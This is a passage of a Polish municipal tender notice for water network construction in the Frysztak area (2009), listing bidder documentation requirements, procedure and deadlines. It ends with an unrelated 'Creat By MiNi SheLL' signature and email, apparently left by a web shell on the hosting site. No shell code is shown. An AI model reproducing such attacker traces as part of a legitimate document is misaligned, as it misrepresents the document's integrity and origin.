4).Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terenem Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa, składa dokumenty lub oświadczenia szczegółowo określone w §2  Rozporządzenia  Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2006 r. Nr 87, poz. 605).

3. Na ofertę składa się:

1). Formularz ofertowy podpisany przez upełnomocnionego przedstawiciela ( przedstawicieli)  wg wzoru określonego w załączniku nr, 1 do SIWZ. Jeżeli prawo do podpisywania oferty nie wynika z dołączonych dokumentów , należy dołączyć pełnomocnictwo do podpisania oferty. 
2).Oświadczenie  o spełnieniu warunków udziału w postępowaniu o treści zgodnej z określoną w załączniku nr 2 do SIWZ. 
3)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4)Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
5)Aktualna informacja z Krajowego Rejestru Krajowego w zakresie określonym w art.24 ust.1 pkt.4-8 ustawy ,  wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
6)Aktualna informacja z Krajowego Rejestru Krajowego w zakresie określonym w art.24 ust.1 pkt.9 ustawy ,  wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7)Wykaz robót zrealizowanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane należycie np. referencje. Warunek zostanie uznany za spełniony , jeżeli w tych latach wykonawca wykonał, : co najmniej 1 (jedną) robotę w zakresie związanym z budową lub modernizacją sieci wodociągowej o długości sieci przesyłowej wody  minimum 10 000 mb. - zgodnie z załącznikiem nr 3 do SIWZ
8)Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności zgodnie z załącznikiem nr 4 do SIWZ
9)Dokumenty  potwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia. Na potwierdzenie należy załączyć uprawnienia budowlane do kierowania:
a)robotami budowlanymi  w specjalności konstrukcyjno - budowlanej, aktualny wpis na listę członków właściwej izby samorządu zawodowego 
b)robotami  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  wodociągowych ,aktualny wpis na listę członków właściwej izby samorządu zawodowego
c)robotami elektrycznymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, aktualny wpis na listę członków właściwej izby samorządu zawodowego
10)Polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie mniejszą niż 500 000,00 ( słownie: pięćset tysięcy złotych) 
11)Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej , w której wykonawca posiada rachunek , potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy nie niższą niż 1 mln zł( jeden milion złotych) wystawione nie wcześniej niż 3 miesiące przed upływem terminu 	składania ofert  
12) Dowód wniesienia wadium
13) Kosztorys ofertowy według załączonych przedmiarów robót
14)Wykaz osób i podmiotów  ( podwykonawców) , które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat zakresu wykonywanych przez  nich czynności, zgodnie z załącznikiem nr 5 do SIWZ 
15) Wykaz osób do kontaktu - zgodnie z załącznikiem nr 6 do SIWZ. 
16)Wzór umowy - zgodnie z załącznikiem nr 7 do SIWZ
 Uwaga: 
1. Kopie dokumentów muszą być potwierdzone, co do zgodności z oryginałem przez  Wykonawcę zgodnie z formą reprezentacji określoną w rejestrze handlowym    kodeksie cywilnym lub w gminnej ewidencji działalności gospodarczej.

2. Złożenie przez  wykonawcę  fałszywych lub stwierdzających nieprawdę dokumentów jest karalne. Zgodnie z  art. 24 ust. 2 pkt 2 ustawy wykonawca, który złożył nieprawdziwe informacje mające wpływ na wynik postępowania zostaje wykluczony z postępowania. Gdy fakt podania  nieprawdziwych informacji wyjdzie na jaw po zawarciu umowy - umowa taka jest  nieważna z mocy prawa.

3. Do specyfikacji dołączono przedmiary dodatkowe dotyczące wykonania przyłączy wodociągowych jako kosztów niekwalifikowanych i kwalifikowanych projektu dla zadania : Budowa sieci wodociągowej w m.Frysztak , Pułanki i Glinik Dolny oraz przebudowa  sieci wodociągowej z przyłączami w m. Frysztak , Pułanki i Glinik Dolny,   które nie należy sumować do  oferty ryczałtowej opracowanej na podstawie przedmiaru  głównego , jednak zamawiający wymaga dołączenia ich jako kosztorysy dodatkowe do oferty , które posłużą do rozliczenia projektu w przypadku otrzymania dofinansowania,  o które ubiega się zamawiający. Również dla zadania :Budowa sieci wodociągowej w miejscowości Frysztak oraz sieci wodociągowej z  przyłączami do budynków i zasilaniem energetycznym w miejscowości Kobyle, należy wycenić wartość robót dotyczącą wykonania robót ziemnych i montażowych dla przyłączy  wodociągowych jako kosztów niekwalifikowanych , których aktualne zestawienie dołączone jest do przedmiaru robót.
Konieczność ta wynika z interpretacji Ministerstwa Infrastruktury dotyczącej definicji przyłącza wodociągowego oraz jego kwalifikowalności do projektu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.frysztak.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Frysztak ul.Ks.W.Blajera 20 , 38-130 Frysztak ,pokój numer 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2009 godzina 10:30, miejsce: Urząd Gminy Frysztak ul.Ks.W.Blajera 20 , 38-130 Frysztak ,pokój numer 8 -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com